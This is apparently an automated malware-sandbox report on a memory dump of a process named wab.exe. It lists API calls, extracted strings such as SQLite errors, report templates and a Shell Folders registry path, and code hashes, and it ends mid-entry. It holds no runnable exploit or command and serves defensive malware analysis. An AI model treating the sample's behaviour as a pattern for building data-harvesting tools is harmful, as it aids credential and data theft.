                  • API String ID: 1214746602-2708368587
                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00405F65
                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                  • GetWindow.USER32(00000000), ref: 00405F80
                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$ItemMessageRectSend$Client
                  • String ID:
                  • API String ID: 2047574939-0
                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                  • String ID:
                  • API String ID: 4218492932-0
                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                  APIs
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                  • memcpy.MSVCRT ref: 0044A8BF
                  • memcpy.MSVCRT ref: 0044A90C
                  • memcpy.MSVCRT ref: 0044A988
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                  • memcpy.MSVCRT ref: 0044A9D8
                  • memcpy.MSVCRT ref: 0044AA19
                  • memcpy.MSVCRT ref: 0044AA4A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                  • API String ID: 3510742995-2446657581
                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                  • memset.MSVCRT ref: 00405ABB
                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                  • SetFocus.USER32(?), ref: 00405B76
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID:
                  • API String ID: 4281309102-0
                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscat
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 384018552-4153097237
                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetwcschr
                  • String ID: 0$6
                  • API String ID: 2029023288-3849865405
                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                  APIs
                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                  • memset.MSVCRT ref: 00405455
                  • memset.MSVCRT ref: 0040546C
                  • memset.MSVCRT ref: 00405483
                  • memcpy.MSVCRT ref: 00405498
                  • memcpy.MSVCRT ref: 004054AD
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy$ErrorLast
                  • String ID: 6$\
                  • API String ID: 404372293-1284684873
                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                  • wcscpy.MSVCRT ref: 0040A0D9
                  • wcscat.MSVCRT ref: 0040A0E6
                  • wcscat.MSVCRT ref: 0040A0F5
                  • wcscpy.MSVCRT ref: 0040A107
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                  • String ID:
                  • API String ID: 1331804452-0
                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                  APIs
                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: advapi32.dll
                  • API String ID: 2012295524-4050573280
                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                  Strings
                  • <%s>, xrefs: 004100A6
                  • <?xml version="1.0" ?>, xrefs: 0041007C
                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                  • API String ID: 3473751417-2880344631
                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset
                  • String ID: %2.2X
                  • API String ID: 2521778956-791839006
                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscpy
                  • String ID: dialog_%d$general$menu_%d$strings
                  • API String ID: 999028693-502967061
                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memsetstrlen
                  • String ID:
                  • API String ID: 2350177629-0
                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                  • API String ID: 2221118986-1606337402
                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                  • String ID:
                  • API String ID: 265355444-0
                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                  • memset.MSVCRT ref: 0040C439
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                  • _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  • memset.MSVCRT ref: 0040C4D0
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                  • String ID:
                  • API String ID: 1973883786-0
                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                  APIs
                  • memset.MSVCRT ref: 004116FF
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2618321458-3614832568
                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                  APIs
                  • memset.MSVCRT ref: 004185FC
                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@AttributesFilememset
                  • String ID:
                  • API String ID: 776155459-0
                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                  • malloc.MSVCRT ref: 00417524
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                  • String ID:
                  • API String ID: 2308052813-0
                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                  APIs
                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PathTemp$??3@
                  • String ID: %s\etilqs_$etilqs_
                  • API String ID: 1589464350-1420421710
                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                  APIs
                  • memset.MSVCRT ref: 0040FDD5
                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 0040FE1F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 1775345501-2769808009
                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                  APIs
                  • wcscpy.MSVCRT ref: 0041477F
                  • wcscpy.MSVCRT ref: 0041479A
                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$CloseCreateFileHandle
                  • String ID: General
                  • API String ID: 999786162-26480598
                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLastMessage_snwprintf
                  • String ID: Error$Error %d: %s
                  • API String ID: 313946961-1552265934
                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
